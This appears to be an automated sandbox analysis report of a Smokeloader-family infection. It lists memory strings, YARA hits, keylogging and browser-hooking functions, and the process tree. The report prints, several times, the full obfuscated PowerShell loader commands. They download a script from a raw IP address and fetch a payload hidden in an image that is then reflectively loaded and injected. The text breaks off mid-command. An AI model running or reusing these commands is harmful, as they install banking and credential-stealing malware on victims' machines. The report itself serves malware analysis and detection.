                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
                Source: explorer.exe, 0000000E.00000002.2901016228.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
                Source: explorer.exe, 0000000E.00000000.1994245178.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2901016228.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 0000001A.00000002.2892796077.00000000005D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.2893384423.0000000002791000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7944, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 7728, type: MEMORYSTR
                Source: Yara matchFile source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_0279162B GetKeyboardState,ToUnicode,27_2_0279162B

                E-Banking Fraud

                barindex
                Source: C:\Windows\SysWOW64\explorer.exeCode function: StrStrIA, chrome.exe|opera.exe|msedge.exe20_2_02CA2EA8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe20_2_02CA3862
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, iexplore.exe20_2_02CA3862
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, microsoftedgecp.exe20_2_02CA3862
                Source: C:\Windows\SysWOW64\explorer.exeCode function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, chrome.exe20_2_02CA3862

                System Summary

                barindex
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                Source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = 